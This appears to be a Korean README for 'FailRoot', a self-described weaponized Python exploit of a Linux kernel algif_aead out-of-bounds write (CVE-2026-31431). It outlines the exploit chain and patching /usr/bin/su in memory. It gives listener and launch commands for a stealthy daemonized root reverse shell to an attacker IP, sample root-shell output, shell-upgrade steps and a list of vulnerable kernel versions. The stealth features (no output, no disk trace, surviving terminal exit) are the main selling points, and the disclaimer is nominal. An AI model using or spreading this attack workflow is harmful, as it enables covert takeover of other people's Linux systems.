
# CVE-2026-31431 무기화된 Python 익스플로잇 Linux 커널 권한 상승을 데몬화된 루트 리버스 셸(전체 PTY 포함)로 연결하고, /usr/bin/su를 메모리 내에서 패치하는 CVE-2026-31431용 무기화된 Python 익스플로잇입니다.
█▀▀ ▄▀█ █ █ █▀█ █▀█ █▀█ ▀█▀
█▀░ █▀█ █ █▄▄ █▀▄ █▄█ █▄█ ░█░
CVE-2026-31431 • Linux Kernel LPE → Root Reverse Shell
FailRoot는 Linux 커널의 crypto: algif_aead 서브시스템에서 발생하는 CVE-2026-31431 — 경계를 벗어난 쓰기(out-of-bounds write) 취약점을 악용하는 무기화된 익스플로잇입니다.
권한 상승과 완전한 PTY를 갖춘 데몬화된 루트 리버스 셸을 연결합니다:
AF_ALG + splice() → 4바이트 페이지 캐시 쓰기 → /usr/bin/su 패치 → root
익스플로잇 전체가 단일 파일에 담겨 있습니다. 컴파일 불필요. 외부 의존성 없음. 디스크에 흔적 없음 — su 바이너리는 메모리에서만 패치됩니다.
algif_aead + authencesn/usr/bin/su 페이지 캐시에 4개의 제어된 바이트 쓰기pty.spawn("/usr/bin/su") → 완전한 대화형 루트 TTY리버스 셸은 터미널 종료 후에도 유지되며(SIGHUP 무시), 대상에서 출력을 전혀 표시하지 않고, 최대 3분 동안 재시도하며 연결합니다.
# 공격자 — 리스너 시작:
nc -lvnp 4444
# 대상 — 익스플로잇 실행 (아무것도 표시되지 않으며, 즉시 데몬화됨):
python3 exploit.py <ATTACKER_IP> 4444
attacker ~ $ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.100] from [192.168.1.50] 50234
root@victim:~# id
uid=0(root) gid=0(root) groups=0(root)
Ctrl+Z
stty raw -echo; fg
reset
export TERM=xterm-256color
export SHELL=/bin/bash
os.splice())/usr/bin/su 읽기 권한 (모든 배포판에서 전 세계적으로 읽기 가능)algif_aead 및 authencesn 사용 가능sudo 불필요승인된 보안 연구 및 교육 목적으로만 사용하십시오. 오용은 불법입니다.
| 시작 | 종료(제외) |
|---|
| 4.14 | 5.10.254 |
| 5.11 | 5.15.204 |
| 5.16 | 6.1.170 |
| 6.2 | 6.6.137 |
| 6.7 | 6.12.85 |
| 6.13 | 6.18.22 |
| 6.19 | 6.19.12 |
| 7.0 | rc1–rc6 |